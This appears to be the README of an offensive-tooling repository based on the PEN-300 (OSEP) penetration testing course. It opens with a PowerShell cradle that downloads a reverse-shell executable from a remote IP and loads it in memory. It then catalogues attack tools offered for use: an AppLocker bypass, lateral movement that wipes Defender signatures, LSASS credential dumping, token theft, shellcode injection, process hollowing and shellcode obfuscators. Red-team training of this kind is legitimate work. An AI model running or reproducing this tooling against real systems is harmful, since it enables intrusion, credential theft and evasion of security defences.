OSEP Code Snippets
Code examples are provided as-is, without any form of warranty. Based on Offensive Security's PEN-300 course.
Classes and methods are public, so most binaries should allow for reflective loading as below.
```powershell
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main("".Split())
```
|AppLocker Bypass PowerShell Runspace (C#)||Base binary for an applocker bypass using a combination of
|Fileless Lateral Movement (C#)||Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as
|Linux Shellcode Loaders (C)||Various C-based shellcode loaders, including base binaries for library hijacking.|
|MiniDump (C# & PS1)||A simple binary to Dump LSASS to
|MSSQL (C#)||An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.|
|PrintSpoofer.NET (C#)||Steals the token of the incoming authentication forced with the PrintSpooler exploit, and uses that token to run a given binary. Modified to not require an interactive logon session. Takes arguments for the pipe name and binary to run.|
|ROT Shellcode Encoder (C#)||A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes an argument for the number of rotations.|
|Sections Shellcode Process Injector (C#)||Injects and runs shellcode using
|Shellcode Process Hollowing (C#)||Hollows a
|Shellcode Process Injector (C# & PS1)||Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as a native PowerShell script (though it is a bit simpler).|
|Simple Shellcode Runner (C# & PS1 & VBA)||The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.|
|XOR Shellcode Encoder (C#)||A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.|